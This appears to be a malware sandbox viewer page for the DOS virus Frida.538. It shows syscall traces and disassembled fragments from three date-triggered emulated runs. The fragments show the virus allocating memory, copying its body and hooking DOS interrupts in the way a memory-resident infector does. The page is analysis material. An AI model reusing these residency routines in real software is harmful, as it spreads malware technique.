Sample viewer

vx.netlux.org/Virus.DOS.Frida.538

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-17T22:16:36.674435625Z 120 PC: 12a5c | UNKNOWN!
2018-12-17T22:16:36.675790695Z 42 PC: 12a60 | Get date 0x12a60: cmp dx, 0x801
0x12a64: jne 0x12a69
0x12a66: jmp 0x12c02
0x12a69: push es
0x12a6a: mov ax, cs
0x12a6c: dec ax
0x12a6d: mov ds, ax
0x12a6f: mov ax, word ptr [3]
0x12a72: sub ax, 0x30b
0x12a75: mov bx, ax
0x12a77: mov ah, 0x4a
0x12a79: int 0x21
0x12a7b: mov ah, 0x48
0x12a7d: mov bx, 0x30a
0x12a80: int 0x21
0x12a82: mov es, ax
0x12a84: xor di, di
0x12a86: mov si, 0x110
0x12a89: mov cx, 0x21a
0x12a8c: rep movsb byte ptr es:[di], byte ptr [si]
2018-12-17T22:16:36.678755752Z 74 PC: 12a7b | Reallocate memory
2018-12-17T22:16:36.680033209Z 72 PC: 12a82 | Allocate memory
2018-12-17T22:16:36.681991211Z 53 PC: 9cbc5 | Get interrupt vector (Interrupt = '33' AKA 'Random read')
2018-12-17T22:16:36.683174649Z 37 PC: 9cbd8 | Set interrupt vector (Interrupt = '120' AKA 'UNKNOWN!')
2018-12-17T22:16:36.684241501Z 37 PC: 9cbe1 | Set interrupt vector (Interrupt = '33' AKA 'Random read')
2018-12-17T22:16:36.685535929Z 76 PC: 12a45 | Terminate with return code (Return code = '0')

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":2956,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:47:51.553920075Z 120 PC: 12a5c | UNKNOWN!
2018-12-25T11:47:51.560090768Z 42 PC: 12a60 | Get date 0x12a60: cmp dx, 0x801
0x12a64: jne 0x12a69
0x12a66: jmp 0x12c02
0x12a69: push es
0x12a6a: mov ax, cs
0x12a6c: dec ax
0x12a6d: mov ds, ax
0x12a6f: mov ax, word ptr [3]
0x12a72: sub ax, 0x30b
0x12a75: mov bx, ax
0x12a77: mov ah, 0x4a
0x12a79: int 0x21
0x12a7b: mov ah, 0x48
0x12a7d: mov bx, 0x30a
0x12a80: int 0x21
0x12a82: mov es, ax
0x12a84: xor di, di
0x12a86: mov si, 0x110
0x12a89: mov cx, 0x21a
0x12a8c: rep movsb byte ptr es:[di], byte ptr [si]
2018-12-25T11:47:51.561664384Z 74 PC: 12a7b | Reallocate memory
2018-12-25T11:47:51.562692679Z 72 PC: 12a82 | Allocate memory
2018-12-25T11:47:51.564109788Z 53 PC: 9cbc5 | Get interrupt vector (Interrupt = '33' AKA 'Random read')
2018-12-25T11:47:51.565244429Z 37 PC: 9cbd8 | Set interrupt vector (Interrupt = '120' AKA 'UNKNOWN!')
2018-12-25T11:47:51.5663321Z 37 PC: 9cbe1 | Set interrupt vector (Interrupt = '33' AKA 'Random read')
2018-12-25T11:47:51.567605894Z 76 PC: 12a45 | Terminate with return code (Return code = '0')

{"DateBased":true,"Day":1,"Month":8,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":2956,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:47:51.603581884Z 120 PC: 12a5c | UNKNOWN!
2018-12-25T11:47:51.605560689Z 42 PC: 12a60 | Get date 0x12a60: cmp dx, 0x801
0x12a64: jne 0x12a69
0x12a66: jmp 0x12c02
0x12a69: push es
0x12a6a: mov ax, cs
0x12a6c: dec ax
0x12a6d: mov ds, ax
0x12a6f: mov ax, word ptr [3]
0x12a72: sub ax, 0x30b
0x12a75: mov bx, ax
0x12a77: mov ah, 0x4a
0x12a79: int 0x21
0x12a7b: mov ah, 0x48
0x12a7d: mov bx, 0x30a
0x12a80: int 0x21
0x12a82: mov es, ax
0x12a84: xor di, di
0x12a86: mov si, 0x110
0x12a89: mov cx, 0x21a
0x12a8c: rep movsb byte ptr es:[di], byte ptr [si]